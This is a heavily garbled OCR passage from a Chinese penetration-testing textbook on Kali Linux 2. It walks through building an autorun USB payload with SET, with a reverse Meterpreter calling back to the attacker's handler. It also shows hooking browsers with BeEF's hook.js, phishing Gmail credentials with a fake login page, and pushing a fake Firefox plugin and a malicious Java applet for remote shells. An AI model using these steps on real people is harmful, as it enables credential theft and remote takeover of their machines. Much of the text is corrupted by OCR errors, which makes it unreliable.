注意 这 里 ， 不 同 的 浏览 右 可 能 会 有 不 同 的 处 理 方式 ， 如 图 9-57 所 
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图 9-57 系统 日 动 下 载 HTA 文 件 


i 系统 了 加 会 上 日 动 下 载 一 个 HTA 文 件 ， 如 图 9-58 
7we 





A Launcher.hta 的 上 下载 方式 实 尾 
RE , 因此 产 吕 能 存 侍 危险 。 


ECT ^ 


入 9-58  PFzXHJLauncher.hta X- fF 


跟 之 前 的 Java Applet 攻 击 一 样 ， 如 果 你 选择 执行 了 这 个 HTA 文 件 的 
话 ， 渗 透 测 试 者 束 可 以 控制 你 的 计算 机 了 。 


9.9 HEdjS WX TL 


RUZE 2838 TUGURE— Rb A HKR, Dn LEUR 
一 插 到 计算 机 上 ， 就 会 立刻 执行 的 病毒 。SET 中 也 提供 了 这 种 功能 。 


图 9-59 中 的 第 3 种 就 是 第 见 媒 介 感 染 ， 这 里 面 的 媒介 指 的 是 光盘 和 U 
入 等 ， 日 前 光 税 已 经 极为 少见 了 ， 所 以 我 们 这 里 只 介绍 了 U 榜 方式 。 


File Edit View Search Terminal Help 


Select from the menu: 


1) Spear-Phishing Attack Vectors 
2) Website Attack Vectors 

3) Infectious Media Generator 

4) Create a Faytoad and Listener 
5) Mass Mailer Attack 

6) Arduino-Based Attack Vector 


7) Wireless Access Point Attack Vector 
8) QRCode Generator Attack Vector 

9) Powershell Attack Vectors 

10) SMS Spoofing Attack Vector 

11) Third Party Modules 


99) Return back to the main menu. 





9-59 Infectious Media Generator it 7j 3X 


这 种 渗透 测试 执行 时 ， 会 产生 两 个 文件 ， 一 个 是 autorun.inf 文 件 ， 
一 个 是 Metasploit 的 攻击 载荷 文件 。 当 这 个 移动 媒介 《比如 说 U 往 ) 一 插 
入 到 计算 机 上 时 ，autorun.inf 文 件 束 会 目 动 将 男 一 个 攻击 模块 执行 。 这 
里 面 的 攻击 模块 有 两 个 选择 ， 第 一 种 是 基于 文件 格式 的 渗透 村 块 ， 第 二 


种 是 Metasploit 的 执行 模块 ， 如 图 9-60 所 示 。 


The USB/CD/DVD module will create an autorun.inf file and a 
Metasploit payload. When the DVD/USB/CD is inserted, it will automatically 
run if autorun is enabled. 


Pick the attack vector you wish to use: fileformat bugs or a straight executabl 
e. 


1) File-Format Exploits 
2) Standard Metasploit Executable 


99) Return to Main Menu 


>f 





19-60 “File-Format Exploits” JX it; 77 3X 
这 里 我 们 选择 第 二 种 ， 即 Metasploit 的 执行 模块 ， 如 图 9-61 所 示 。 


1) File-Format Exploits 
2) Standard Metasploit Executable 


99) Return to Main Menu 





图 9-61 ” Metasploit 的 执行 模块 
然后 在 这 里 面 选择 要 执行 的 功能 ， 如 图 9-62 所 示 。 


Terminal o o0 
File Edit View Search Terminal Help 


1) Windows Shell Reverse TCP Spawn a command shell on victim an 
d send back to attacker 

2) Windows Reverse TCP Meterpreter Spawn a meterpreter shell on victi 
m and send back to attacker 

3) Windows Reverse TCP VNC DLL Spawn a VNC server on victim and s 
end back to attacker 

4) Windows Shell Reverse TCP X64 Windows X64 Command Shell, Reverse 
TCP Inline 

5) Windows Meterpreter Reverse TCP X64 Connect back to the attacker (Wind 
ows x64), Meterpreter 

6) Windows Meterpreter Egress Buster Spawn a meterpreter shell and find 
a port home via multiple ports 

7) Windows Meterpreter Reverse HTTPS Tunnel communication over HTTP usi 
ng SSL and use Meterpreter 

8) Windows Meterpreter Reverse DNS Use a hostname instead of an IP ad 
dress and use Reverse Meterpreter 

9) Download/Run your Own Executable Downloads an executable and runs i 
t 





图 9-62 ”选择 要 执行 的 功能 


这 里 我 们 选择 一 个 要 使 用 的 攻击 载 傈 ， 比 如 图 9-62 所 示 最 为 沼 见 的 
然后 设置 一 下 攻击 载荷 的 IP 地 址 和 端口 。 如 图 9-23 所 示 将 IP 地 址 设置 
73192.168.169.130, ml BJ5555. 


22 
> IP address for the payload listener (LHOST) 192.168.169.130 
> Enter the PORT for the reverse listener 5555 


Generating the payload.. please be patient. 


图 9-63 ix EJ SER BJIPAI RS O 





" 


系统 会 根据 你 的 输入 生成 U 盘 自动 运行 程序 。 一 段 时 间 ， 
一 会 会 生成 两 个 文件 payload.exe 和 autorun.inf。 


Generatina_the_navload.. nlease be patient . 

Payload has been exported to the default SET directory located under: /root/ 
.Set//payload.exe 

Your attack has been created in the SET home directory (/root/.set/) folder 


'autorun' 

Note a backup copy of template.pdf is also in /root/.set/template.pdf if nee 
ded. 

Copy the contents of the folder to a CD/DVD/USB to autorun 

> Create a listener right now [yes|no]: B 


图 9-64 w ELA EG SUR DJ E. 


如 图 9- 64 所 不， 两 个 文件 生成 完毕 之 后 位 于 /root/.set/autorun/ 目 录 
下 ， 注 意 这 是 一 个 隐藏 的 目录 ， 在 资源 党 理 井 是 看 不 到 的 。 





All payloads get sent to the template.pdf directory 
Your attack has been created in the SET home directory (/root/.set/) folder 
'autorun' 


Note a backup copy of template.pdf is also in /root/.set/template.pdf if nee 
ded. 
Copy the contents of the folder to a CD/DVD/USB to autorun 


[9-65 ”生成 的 攻击 载 何 


接 下 来 系统 提示 会 如 图 9-65 所 示 ， 如 果 要 使 用 这 两 个 文件 的 话 ， 需 
要 将 这 两 个 文件 复制 到 一 个 USB 设 备 中 。 接 下 来 SET 会 询问 是 否 创建 一 


个 Handler。 





i 
图 9-66 ”是否 创 建 一 个 监听 此 


选择 yes 之 后 ， 系 统 会 启动 Metasploit， 然 后 自动 创建 一 个 Handler， 
加 19-67 HIrzs Oo 
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http://metasploit.com 


486 payloads - 40 encoders - 9 nops 
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1659 exploits - 950 auxiliary - 293 post ] 
] 
Free Metasploit Pro trial: http://r-7.co/trymsp ] 
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Processing /root/.set/meta config for ERB directives. 
resource (/root/.set/meta_config)> use multi/handler 


resource (/root/.set/meta_config)> set payload windows/meterpreter/reverse tcp 
payload => windows/meterpreter/reverse tcp 
resource (/root/.set/meta_config)> set LHOST 192.168.169.130 
LHOST => 192.168.169.130 
.set/meta config)» set LPORT 5555 


.Set/meta config)> set ExitOnSession false 
false 
resource (/root/.set/meta config)> exploit -j 
Exploit running as background job. 


Started reverse TCP handler on 192.168.169.130:5555 
Starting the payload handler... 
msf exploit( ) > | 





Kl9-67 ”日 动 创建 一 个 Handler 


接 下 来 我 们 将 /root/.set/autorun/ 目 录 下 的 两 个 文件 复制 到 外 部 ， 我 们 
在 root 下 创建 一 个 test 文 件 夹 ， 然 后 执行 命令 cp -r /root/.set/autorun/* 
/root/test/， 得 到 的 结果 如 图 9-68 所 示 。 


WS. 4 Q Home test » QO 


Q) Recent 

fir Home autorun.inf —payload.exe 
æ Desktop 
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(D) Trash 


(Œ) Floppy Disk 


图 9-68 ”生成 的 攻击 载 何 


将 上 面 的 两 个 文件 复制 到 U 盘 上 ， 然 后 将 U 盘 插入 到 别 的 计算 机 
上 ， 如 图 9-69 所 示 。 
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图 9-69 ”将 攻击 U 盘 插入 到 计算 机 中 


当 另 外 一 侣 计算机 中 执行 了 这 个 文件 之 后 ， 束 会 加 载 控制 
payload.exe， 然 后 我 们 返回 到 Kali Linux 2 来 租 看 一 下 都 及 生 了 什么 ， 如 
图 9-70 所 示 。 


File Edit View Search Terminal Help 


Started reverse TCP handler on 192.168.169.130:5555 
Starting the payload handler... 
msf exploit( E Sending stage (957487 bytes) to 192.168.169.131 


Meterpreter session 1 opened (192.168.169.130:5555 -> 192.168.169.131:49213) 
at 2017-07-12 03:24:59 -0400 
msf exploit( ) > 





图 9-70 HARAM 


由 图 9-70 可 以 看 出 已 经 打开 了 一 个 新 的 会 话 。 不 过 由 于 现在 操作 系 
统 安全 性 能 的 不 断 提高 ， 我 们 会 发 现 autorun.inf 文 件 其 实 很 难 执行 了 。 


但 是 ， 你 是 侣 设想 过 ， 当 你 使 用 一 个 来 历 不 明 的 鼠标 、 键 盘 ， 其 至 
一 个 苑 电 卉 时 ， 痢 有 可 能 会 寻 致 系统 航 渗 透 呢 ? 这 里 面 我 推荐 一 个 便 件 
Teensy， 攻 击 者 在 使 用 这 个 便 件 定制 攻击 设备 时 ， 会 回 USB 设 备 中 置 入 
一 个 攻击 已 片 ， 此 攻击 心 厂 是 一 个 非 第 小 巧 且 功能 完整 的 单片机 开 友 系 
统 ， 它 能 够 实现 多 种 类 型 的 项 目 开 友和 设计 。 但 是 限于 本 书 的 篇 幅 ， 这 
里 不 再 进行 评 细 的 介绍 ， 如 果 你 希望 对 此 进行 更 深入 的 研究 ， 可 以 参考 
这 个 工具 包 的 官方 网 址 https://www.social-engineer.org/framework/se- 
tools/computer-based/social-engineer-toolkit- et/ 提 供 的 教程 。 


9.10 ”小 结 


本 章 介 绍 了 一 个 全 新 的 攻击 方式 : 社会 工程 学 。 鉴 于 单纯 地 针对 目 
标 漏 洞 展 开 攻击 的 方式 成 功率 已 经 越 来 越 低 ， 越 来 越 多 的 网 络 黑 客 和 在 攻 
击 中 采用 了 各 种 各 样 的 社会 工程 学 方式 。 因 此 作为 一 个 网 络 渗透 测试 
者 ， 社 会 工程 学 是 一 个 必 不 可 少 的 技能 。 


本 划一 开始 介绍 Y Kali Linux 2 中 社会 工程 学 工具 包 的 基本 使 用 方 
法 ， 这 个 工具 包 social-engineer-toolkit 提 供 了 大 量 的 成 熟 的 社会 工程 学 攻 
击 方式 ， 随 后 我 们 束 其 中 最 为 经 典 的 几 种 方式 进行 了 介绍 ， 这 些 方式 包 
括 网 页 攻击 方法 、 使 用 Metasploit 的 模块 、 用 户 名 和 密码 的 盗 取 、 页 面 
动 持 欺骗 方式 、 页 面 动 持 欺 骗 方 式 、HTA 文件 攻击 欺骗 方式 和 自动 播 
放 文 件 攻 击 。 里 然 本 章 花 费 了 大 量 的 骗 幅 来 介绍 这 些 社会 工程 学 攻击 ， 
但 是 仍然 有 很 多 攻击 方法 没有 涉 猫 到。 在 本 章 的 最 后 ， 我 给 出 了 social- 
engineer-toolkit 的 官方 网 址 ， 推 厦大 家 访问 这 个 网 址 ， 来 进一步 了 解 社 
会 工程 学 这 个 新 兴 的 学 科 。 


下 一 半 我 们 将 介绍 为 外 一 个 很 有 意思 的 工具 BeEF-XSS。 


581035 
BeEF-XSS72 55 jE 28 H5 futi Hi 


在 上 一 章 中 我 们 介绍 了 社会 工程 学 ， 这 是 一 种 成 功率 极 高 的 攻击 方 
式 ， 在 这 一 章 中 我 们 来 介绍 一 种 看 起 来 和 它 有 些 相似 的 方法 : XSS CES 
站 脚本 攻击 ) 。 这 种 攻击 指 的 是 恶意 攻击 者 往 Web 页 面 里 插入 恶意 脚本 
代码 ， 当 用 户 浏览 这 个 页 面 的 时 候 ， 鹃 入 的 脚本 代码 会 被 执行 ， 从 而 达 
到 攻击 用 户 的 目的 。 


我 们 在 对 互联 网 进行 访问 的 时 候 ， 其 实 并 没有 意识 a 到 这 里 是 一 个 充 
满 了 危险 的 地 方 。 互 联网 中 的 陷阱 要 远 比 我 们 的 真实 世界 多 的 多 ， 任 何 
在 互联 网 上 浏 唤 到 的 页 和 面部 有 可 能 十 列 人 精心 设计 出 来 的 。 当 你 访问 这 
样 的 一 个 页 面 的 时 候 ， 浏 览 右 束 会 被 恶意 攻击 者 所 控制 。 


在 这 一 半 中 ， 我 们 将 会 使 用 一 个 极为 流行 的 “BeEF” 框 积 来 模拟 一 亿 
活 透 过 程 。BeEF 古 世界 上 最 流行 的 WEB 框 架 攻 击 平 侣 ， 全 称 为 "The 
Browser Exploitation Framework Project”*。 它 的 原理 是 利用 XSS 汤 将 ， 退 
过 一 段 编 写 好 的 JavaScript Chook.js) 控制 目标 主机 的 浏览 
贷 。“BeEF” 本 来 的 意思 是 牛肉 ， 这 个 渗透 框 淋 一 直 在 更 新 中 ， 最 新 的 版 
本 中 添加 了 很 多 高 效 的 功能 ， 男 外 一 点 极为 优 夯 的 地 方 束 是 这 个 渗透 框 
OO NI 我 们 将 从 如 下 几 点 进行 讲 

D 


BeEF 的 启动 
BeEF 的 基本 渗透 操作 

使 用 BeEF 和 Metasploit 协 同 工 作 
BeEF 的 其 他 实用 操作 


10.1 BeEF 的 启动 | 


首先 ， 我 们 来 局 动 BeEF 这 个 XSS 渗 透 框架 ， 同 样 这 个 渗透 框架 可 以 
在 命令 行 或 者 采 单 中 局 动 ， 由 于 这 个 渗透 框架 的 原理 是 建 一 个 存在 跨 
站 漏 泣 的 Web 页 面 ， 所 以 我 们 首先 需要 局 动 Kali 中 的 Web 服 务 右 ， 目 前 
Kali 使 用 的 是 Apache 作 为 Web 服 务 硕 ， 局 动 Apache 的 命令 为 : 


root@kali:~# service apache2 start 


EX isJjApachez n5. tEls]—^ 25m r8 A "beef-xss". 


root@kali:~# beef-xss 


成 功 局 动 BeEF 之 后 ， 会 出 现 两 个 卫 地 址 链接 ， 如 图 10-1 所 示 。 


[*] Please wait as BeEF services are started. 

[*] You might need to refresh your browser once it opens. 
[*] UI URL: http://127.0.0.1:3000/ui/panel 
[*] 
L*] 


Hook: «script src- "http: / / «IP»:3000/hook.js"»«/scr 
Example: «script srcz"http://127.0.0.1:3000/hook. js" erreurs 





图 10-1 ”局 动 之 后 的 BeEF 


其 中 第 一 个 地 址 http://127.0.0.1:3000/ui/panel 是 我 们 用 来 对 BeEF 进 行 
控制 的 操作 界面 。 而 另 一 个 地 址 http:/<IP>:3000/hook.js 就 是 一 段 使 用 JS 
编写 的 脚本 ， 你 可 以 将 这 个 脚本 放置 在 任意 的 一 个 网 页 中 ， 其 他 人 一 浏 
响 这 个 页 面 束 会 家 渗透 。 


在 浏览 器 中 打开 http://127.0.0.1:3000/ui/panel 这 个 地 址 ， 如 图 10-2 所 
Zi 





Places v © Firefox ESR v Sat 22:52 
BeEF Authentication - Mozilla Firefox 


about:sessionrestore x | BeEF Authentication X | + 
127.0.0.1 x B +  z 


Eg Most Visited v WllOffensive Security ‘Ñ Kali Linux ‘Ñ Kali Docs ‘Ñ Kali Tools Kl Exploit-DB Aircrack-ng 





Authentication 
Username: 
Password: 


Login 


Kl0-2 ”BeEF 的 登录 界面 


第 一 次 登录 所 使 用 的 用 户 名 和 密码 都 是 “beef”*， 成 功 登 录 后 显示 的 
界面 如 图 10-3 所 示 。 


P BeEF 0.4.7.0-alpha | Submit Bug | Logout 





图 10-3 ”BeEF 的 控制 界面 


BeEF 的 操作 界面 可 以 分 成 两 个 部 分 。 左 侧 是 所 有 被 渗透 的 主机 ， 
这 里 分 成 了 两 个 部 分 : 一 个 部 分 是 Online Browers， 表 示 当 前 可 以 控制 
的 主机 ; 另 一 个 部 分 是 Offine Browses, 表 示 的 是 曾经 控制 过 的 主机 。 厂 
便 是 一 个 同 导 界面 ， 在 这 个 同 导 界面 中 介绍 了 BeEF 的 功能 和 使 用 方 
法 。BeEF 提 供 了 两 个 用 来 掩饰 的 页 面 的 超级 链 挝 ， 允 是 图 10-3 中 框 起 来 
的 两 个 “here”。 有 前 面 的 一 个 “here” 链 接 到 了 一 个 BeEF 基 本 功能 的 页 面 ， 
后 面 的 一 个 “here” 链 接 到 了 一 个 BeEF 局 级 功能 的 页 面 。 


BeEF 基 本 功能 的 演示 界面 如 图 10-4 所 示 。 














BeEF Basic Demo - Mozilla Firefox o o o 
about:sessionrestore x  BeEF Control Panel x y BeEF Basic Demo x 人 中 
€ ) | 127.0.0.1:3000/demos/basic.html C ||Q Search | *i6& + 会 三 





Eg Most Visited v WlllOffensive Security ‘Ñ Kali Linux Kali Docs ‘Ñ Kali Tools KRExploit-DB W Aircrack-ng 
You should be hooked into BeEF. 





Have fun while your browser is working against you. 


These links are for demonstrating the "Get Page HREFs" command module 


e The Browser Exploitation Framework Project homepage 


e ha.ckers.org homepage 
e Slashdot 


Have a go at the event logger. 
Insert your secret here: | | 





You can also load up a more advanced demo page here 


图 10-4 BeEF 基 本 功能 的 演示 界面 


BeEF 基 本 功能 的 演示 界面 是 一 个 简单 得 没有 任何 图 厂 的 页 面 ， 
BeEF 局 级 功 能 的 演示 界面 如 图 10.5 所 示 . 











The Butcher - Mozilla Firefox o o 0 
about:sessionrestore x  BeEF Control Panel xj The Butcher x VE 
€ | (0|127.0.0.1:3000/demos/butcher/index.html a - SE Search | z + û = 


















Welcome to The Butcher, your source of delicious 
meats. Please feel free to view our samples, sign up 
to our mailing-list or purchase our special 
BeEF-hamper! 





| Our Meaty Friends | | Order Your BeEF-Hamper | 
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内 。 但 是 这 当然 不 可 能 外 一 个 走 的 介 2H 5 ERE E D HA E E RELAIS D 
站 ， 而 是 一 个 充满 了 各 种 各 样 陷阱 的 网 站 。 任何 主机 在 浏览 这 个 网 站 的 
时 候 都 会 家 渗透 。 


但 是 127.0.0.1 是 使 用 Kali Linux 2 本 机 访问 这 个 BeEF 页 面 时 才能 使 用 
的 地 址 ， 如 果 其 他 设备 访问 的 时 候 ， 要 使 用 这 台 Kali Linux 2 主机 的 IP 地 
址 。 在 我 们 本 次 试验 中 ， 使 用 的 卫 地 址 为 192.168.1.104。 


10.2 ”BeEEF 的 基本 渗透 操作 


每 当 有 用 户 不 小 心 揉 进 了 这 个 网 站 的 陷阱 ，BeEF 中 融会 有 显示 ， 
我 们 可 以 在 BeEF 控 制 侣 《也 融 是 我 们 了 最 开始 打开 的 那个 页 面 ) 看 到 被 
控制 的 主机 。 下 面 我 们 使 用 一 全 操作 系统 为 Android 的 手机 设备 来 访问 
这 个 网 站 ， 在 手机 的 浏览 右上 浏览 地 址 “http:/192.168.1.104: 
3000/demos/butcher/index.html”。 这 时 BeEF 控 制 界面 的 左 侧 的 online 
Browsers 分 类 中 就 会 多 出 一 个 IP 地 址 来 ， 如 图 10-6 所 示 。 


Hooked Browsers Getting Started Logs Current Browser 
4 (3 Online Browsers 
4 3 192.168 1.104 Details | Logs || Commands Rider | XssRays | Ipec || Network || WebRTC 





图 10-6 已 经 上 钓 的 主机 IP 地 址 


图 10-6 中 上 面 的 192.168.1.104 是 BeEF 服 务 器 所 在 的 地 址 ， 下 面 的 
192.168.1.101 是 手机 使 用 的 IP 地 址 。 现 在 表示 192.168.1.101 这 个 地 址 已 
经 上 和 钓 了 。 单 击 这 个 地 址 之 后 ，BeEF 和 管理 界面 的 右 侧 束 会 显示 出 更 多 
的 内 容 来 ， 一 共有 detatils、logs、commands、rider、XSsSRays、Ipec、 
Network、WebRTC 这 8 个 选项 卡 。 


其 中 details 选 项 卡 中 显示 的 古 钻 控制 主机 的 信息 ， 如 图 10-7 所 示 。 


Details Logs Commands Rider XssRays Ipec Network WebRTC 


日 Category: Browser (6 Items) 
Browser Version: UNKNOWN 


Bro — -— String: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.101 
Safari/537.3 


Browser Language: zh-CN 

Browser Platform: Win32 

Browser Plugins: Widevine Content Decryption Module, Chrome PDF Viewer,Native Client 
Window Size: Width: 1225, Height: 1007 


日 Category: Browser Components (12 Items) 
Flash: No 

VBScript: No 

PhoneGap: No 


图 10-7 ”被 控制 主机 的 信息 


logs 中 记录 的 古 BeEF 中 的 日 志 。 第 3 个 选项 卡 Commands 是 BeEF 功 
能 中 最 为 午 要 的 ， 这 个 功能 一 共 分 成 了 3 列 ， 左 侧 列 出 来 的 是 所 有 可 以 
使 用 的 模块 ， 这 些 模 块 按 照 它们 的 功能 分 成 了 很 多 种 类 ， 我 们 在 Module 
Tree 中 看 到 的 (ep ARA Ap ARE dg yx 154 25, 中 间 是 模块 执行 
的 命令 ， 右 侧 是 模块 功能 的 介绍 和 详细 设置 ， 通 第 还 有 一 个 执行 
(execute ) 按钮 ， 每 个 模块 前 面 都 有 一 个 有 颜色 的 图 标 ， 一 共有 绿 真 灰 
红 4 种 闫 色 : 


绿色 表示 该 模块 可 以 很 好 地 在 目标 主机 上 运行 而 且 目 标 用 户 并 不 知 


情 。 


ux o P UH RE MIN 
HE. 


灰色 表示 这 个 模块 在 目标 主机 上 的 效果 还 有 待 验证。 
红色 表示 这 个 模块 不 能 在 目标 主机 上 运行 。 


BeEF 中 的 commands 标 签 页 如 图 10-8 所 示 。 


Getting Started * || Logs Current Browser 


Details || Logs Rider XssRays Ipec Network || WebRTC 


Module Tree Module Results History 
Search id 4 date label 
(2 Browser (53) | 
回 Chrome Extensions (6) 
(23 Debug (9) 
DD Exploits (78) 
(2 Host (22) 
C3IPEC (9) 
© Metasploit (1) 
C Misc (16) 
C Network (19) 3 
DD Persistence (5) 
© Phonegap (16) 
© Social Engineering (21) 


图 10-8 ”BeEF 中 的 commands 杯 签 由 


例如 我 们 以 最 后 的 社会 工程 学 工具 包 Social Engineering 中 的 Google 
phishing 为 例 ， 如 图 10-9 所 示 。 


Details Logs | Commands Rider | XssRays Ipec ork WebRTC 
Module Tree Module Bondi — Google Phishing 


Description: ES plugin "sends ima ge Rob E log of 
mail. irem ina the is logged ou e cu il aed if he is 
aged n hahar ta b). "Addition. ally it w il show the Google 
Gmail phishing page (although the URL is NOT 


© Browser (53) 

© Chrome Extensions (6) 
© Debug (9) 

© Exploits (78) 





favi ania 
the el | URL). 





© Host (22) Id: 36 
向 IPEC (9) 
回 Metasploit (1) vm ok http://0.0.0.0:3000/demos/basic.html 
C Misc (16) 
(Z3 Network (19) Gmai I logout 10000 
© Persistence (5) interval (ms): 
© Phonegap (16) Redirect 1000 
4 C3 Social Engineering (21) delay (ms): 
Clickjacking 


Fake LastPass 
Lcamtuf Download 
& Clippy 
@ Fake Flash Updat 
®@ Fake Notificatio br r (Chrome) 
nia € ation Bar (Firefox) 


NO Ba 
CETT e Phishing 
Pret erl 
Ə Re cui Video T ke Plugin) 


@ Simple a cke 
€ TabNabbing 


@ Fake Evernote Web Clipper Login 
@ Firefox Extension (Bindshell) Execute 
s Eirofov Evtonecion (Drannor) x | 





图 10-9 ”BeEF 中 的 Google phishing7] IÑ 


这 是 一 个 伪造 页 面 的 模块 ， 当 我 们 单 击 右 下 角 的 Execute 按 钮 之 后 
ED 车 目标 浏览 器 上 伪造 一 个 Google 邮 箱 的 登录 页 面 来 ， 如 图 10-10 
所 示 。 


现在 我 们 重新 打开 手机 ， 等 得 一会儿， 刚才 的 页 面 束 上 自动 变换 成 为 
了 Google 的 登录 页 面 。 


如 果 手 机 用 户 相 信 了 这 个 页 面 的 话 ， 束 会 在 该 页 面 中 输入 日 己 的 用 
户 名 和 密码 ， 如 网 10-10。 





Google Mail: Email... 


New to Google Mail? Eie iz esq P eT 





Sign in 

Username 
re intuitive, admin@ oogle.com 
;oogle Mail iom 


Password 





J) of free | Signin | Stay signed in 


Can't access your account? 


n more 


an account 


n email 


图 10-10 用户 在 登录 页 面 输入 用 户 名 和 密码 


这 种 攻击 针对 手机 的 浏 贤 絮 极为 有 效 ， 因 为 大 部 分 人 在 查看 手机 济 
览 器 时 不 会 注意 到 地 址 栏 的 。 所 以 成 功率 很 高 。 

那么 ， 如 何 才 能 在 BeEF 中 查看 到 我 们 截获 的 用 户 名 和 密码 呢 ? 7; 
法 也 很 简单 ， 我 们 只 需要 在 中 间 那 一 栏 中 ， 找 到 刚刚 执行 的 命令 ， 例 如 
刚才 执行 的 是 command1， 单 击 这 个 command1， 那 么 在 最 右 侧 束 会 出 现 
执行 命令 的 结果 ， 如 图 10-11 所 示 。 


Module Results History Command results 


id 4 date abe 1 
: data: resultaiUsername: admin(google.com Password: admin123456 
0 2017-08-27 01:45 








图 10-11 EBeEF'P? ZrUd& 3k UM FH IP ARR RU 


H Der SITIO ES RE S Y HF Z 7Jadminggoogle.com, KWN 
admin123. 


如 果 你 希望 能 其 骗 用 户 下 载 一 个 远程 控制 的 被 控 端 ， 就 可 以 使 用 伪 
造 的 插件 ， 例 如 这 里 目标 使 用 Firefox 浏 览 器 ， 我 们 就 诱 使 目标 下 载 一 个 
伪造 的 Firefox 插 件 ， 首 先 找到 这 个 插件 所 在 的 位 置 ， 如 图 10-12 所 示 。 


Module Tree | 
Search 
- ag) Browser (53) 
; Q Chrome Extensions (6) 
> [-] Debug (98) 
> 到] Exploits (78) 
: Host (22) 
> LJIPEC (8) 
> G Metasploit (1) 
: Misc (18) 
> C Network (18) 
- DD Persistence (5) 
> J Phanegap (18) 
4 3 Social Engineering (21) 
Clickjacking 
Fake LastPass 
L camtuf Download 
e Clippy 
B Fake Flash Update 
B Fake Notification Bar (Chrome) 
D Fake Notification Bar (Firefox) 1 
B Fake Notification Bar (IE) 


图 10-12 ”选择 仿造 的 Firefox 皇 件 


我 们 首先 根据 目标 浏览 器 的 类 型 选中 要 使 用 的 伪造 插件 模块 ， 这 里 
以 Firefox 为 例 ， 如 图 10-13 所 示 。 


Fake Notification Bar (Firefox) 


Description: Displays a fake notification bar at the top of the screen, similar to those presented in Firefox. If the user clicks the n 
malicious Firefox extension (by default). 


Id: 35 
Plugin URL: — |http://0.0.0.0:3000/api/ipec/ff. extension 2 


Notification An additional plug-in is required to display some elements on this page. 3 
text: 


图 10-13 ”对 伪造 的 Firefox 插 件 进 行 设 置 


当然 我 们 并 不 是 真 的 要 目标 来 下 载 一 个 插件 ， 而 是 一 个 伪 竣 的 远程 
控制 的 被 控 端 ， 那 么 就 可 以 在 图 10-13 中 的 位 置 2 来 执行 所 需要 使 用 的 远 
程控 制 的 被 控 病 程序 。 图 10-14 中 的 位 置 3 则 好 示 了 在 目标 主机 浏览 希 上 
由 容 ， 单 击 执行 乙 后， 我 们 在 手机 闯 可 以 看 到 如 图 10-14 所 示 的 
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Welcome to The Butcher, your source of delicious 
meats. Please feel free to view our samples, sign up 
to our mailing-list or purchase our special BeEF- 
hamper! 








| Our Meaty Friends | | Order Your BeEF-Hamper 


图 10-14 ”BeEF 伪 造 的 插件 下 载 


如 图 10-14 所 示 ， 图 中 框 选 部 分 即 为 伪造 的 插件 ， 如 果 用 尸 下 载 了 
- ii TT FJFTATT BUS. MARITE EA SCHIOSE ELT BL n ida h 


男 外 我 们 可 以 使 用 一 种 与 这 个 方法 相同 的 效果 十 分 明显 的 Java 
Payload 方 法 。 这 种 方法 通过 弹出 安装 插件 的 方式 记 使 目标 安装 这 个 伪 
造 插 件 ， 其 实 这 个 插件 是 我 们 精心 设计 的 木马 文件 。 这 种 方法 的 成 功率 
相当 高 。 使 用 的 方法 是 在 命令 标签 中 ， 依 次 选中 ExploiVLocal Host 下 的 
Java Payload， 如 图 10-15 所 示 。 


Details || Logs | Commands | Rider | XssRays || Ipec | Network 

















Module Tree 
Search 
> [-] Browser (53) 
> D Chrome Extensions (6) 
> E Debug (8) 
4 3 Exploits (78) 
: BeEF bind (3) 
> 加 Camera (3) 
c] Local Host (7 
USU AUIS 


TOUS 






e Windows Mail Client DoS 
i ActiveX Command Execution 
i IE MS12-D004 midiOutPlayMextPolyEvent Heap Overflow 
e IE M313-058 CCaret Use-After-Free 
ip Safari Launch App 
: NAS (2) 
: Router (30) 
> [Switch (1) 
> [23 X55 (4) 
B Apache Cookie Disclosure 
B Apache Felix Remote Shall (Reverse Shell) 


图 10-15 ”选择 Java Payload ER 


选中 这 个 模块 之 后 ， 在 右 侧 会 弹出 这 个 模块 的 属性 设置 ， 这 里 设置 
的 束 是 一 会 儿 用 来 伪装 成 浏览 酉 插件 的 被 控 病 程序 。 这 里 我 们 只 需要 将 
Connect Back to Host〈 回 连 控制 主机 ) 设置 为 我 们 主 控 问 程 序 所 在 的 地 
址 即 可 ， 这 里 我 们 将 其 设置 为 192.168.1.104， 如 图 10-16 所 示 。 


Java Payload 
Description: Inject a malicious signed Java Applet (JavaPayload) that connects back to the attacker 


Before launching it, be sure to have the JavaPayload StagerHandler listening, 
i.e.: java javapayload.handler.stager.StagerHandler «payload» «IP» «port» -- JSh 


Windows Vista is not supported. 


Id: 164 

Payload: ReverseTCP 
Connect Baci | 7 TT NT 
to Host: 





Connect Back |6666 
to Port: 


Applet id: 6i1gv2r89t3ck85eqf3s 


图 10-16 ”设置 伪装 的 被 控 端 程序 
需要 注意 的 是 ， 在 启动 这 个 模块 之 前 我 们 要 在 Kali Linux 2 中 打开 一 


个 handler， 如 图 10-17 所 示 。 这 个 handler 的 设置 要 和 这 里 的 Payload 一 模 
一 样 。 


nsf Pap Ed ( ) > Set payload java/meterpreter/reverse tcp 
» java/meterpreter/reverse tcp 
) > set lhost 192.168.1.104 


) > set lport 6666 








sf exploit( » exploit 


图 10-17 ”设置 Metasploit 中 的 handler 


在 “Module Results History” 标 们 中 租 看 命令 执行 的 过 程 ， 如 网 10-18 
所 示 。 


在 “Command result*” 中 查看 执行 过 的 命令 ， 如 图 10-19 所 示 。 


Module Results History 
id a date label 
0 2017-08-27 05:49 command 1 


10-18 “Module Results History” T 









































Command results 


data: Applet with id[mcSlfoSbkglvoonabübv] added to the DOM. 


图 10-19 “Command result”* 中 执行 过 的 命令 


在 目标 主机 上 束 会 弹出 一 个 伪造 的 应 用 程序 窗口 ， 如 图 10-20 所 
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RN 次 应 用 程序 的 数字 签名 无 法 验证 。 是 否 要 运行 该 应 用 
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图 10-20 ”弹出 的 伪造 的 应 用 程序 窗口 
如 有 末 目 标 执行 了 这 个 payload 的 话 ， 同 样 会 返回 一 个 控制 会 话 


(session) ， 如 图 10-21 所 示 。 


Started reverse TCP handler on 192.168.1.104:6666 
Starting the payload handler... 


Sending stage (49645 bytes) to 192.168.1.105 
Meterpreter session 1 opened (192.168.1.104:6666 -> 192.168.1.105:49565) at 
2017-08-28 04:20:42 -0400 


图 10-21 打开 的 Session 会 话 





10.3 ”使 用 BeEF 和 Metasploit 协 同 工 作 


男 外 我 们 可 以 在 BeEF 中 集成 所有 的 Metasploit 功 能 ， 图 10-22 给 出 了 
没有 集成 Metasploit 之 前 的 BeEF 模 块 ， 这 里 显示 可 用 的 Metasploit 模 块 只 
H—^. 


(Browser (53) 
—]Chrome Extensions (65) 
Debug (9) 

国 | Expleits (78) 

(Cj Host (22) 


